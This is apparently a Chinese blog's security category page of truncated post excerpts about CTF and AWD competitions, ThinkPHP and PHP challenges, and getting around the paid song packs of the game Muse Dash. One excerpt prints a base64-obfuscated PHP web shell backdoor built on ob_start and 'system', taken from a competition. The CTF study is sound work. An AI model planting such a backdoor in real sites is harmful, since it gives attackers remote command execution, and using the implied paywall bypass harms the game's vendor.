分类：安全

起因是氪不起曲包 我很喜欢的音游——Muse Dash，在 10 月 28 日的时候发布了万圣节更新。新的游戏更新里加入了“周免”机制。即每周都会有一首付费曲包里的歌曲供玩家免费试玩，这样玩家就会有动力氪金买曲包了。 但是我这阵子手头一直不宽裕，比赛的钱最迟有要到下学期才发...

上个月打 ByteCTF 线下 AWD 时，有一个靶机是 OpenSNS 这个站。比赛第一天情况还好，全场基本上只拿着主办方留的后门互相打；到了第二天早上才爆出了两个洞，我对着流量陆陆续续地修了好久。 其中一个是因为 ThinkPHP 3 的模板设计缺陷而引发的漏洞，这是 ThinkPHP 3 开发...

前几天一直在打 RoarCTF。Web 题总得来说难度适中，正好适合我这种菜鸡学习新东西 XD 虽然第一天刚开始的时候平台一直进不去，从而导致一堆娱乐圈的弱智直接知乎见。真的无语。其实整场比赛下来我感觉还是蛮爽的，虽然容器有时不是很稳，但从题目质量上来说确实看得出是师傅们是蛮用心的。 自己花了一下午...

是二血呢~ 今天上午忙着去补考工程经济学，50 分钟就出考场回协会做题。 很开心 Web1 boring_code 拿了二血，同时下午也得知补考被老师捞过了，晚上还在协会吃了烧烤。真的是很开心的一天呢~ 那么就来聊聊这道题吧。 回归 PHP 语言的本身 Web 中的 PHP 题，...

先从安全聊起 上周六协会 AWD，其中的 web1 中，有一个ob_start()的后门，具体代码是这样的： @ob_start(base64_decode('c3lzdGVt')); echo "$_GET[persistent]";...

今天六一，协会举办了大一第一次线下 AWD。 很开心最后我们组能获得第一。虽然上午被疯狂 Check Down 到自闭，但下午全靠 Moesang 大佬弹了四五个 Shell 疯狂cat /flag，同时 Y 也把 Pwn 给修好了。一下午就没怎么 Down 过，除了我中途修坏了一道 web...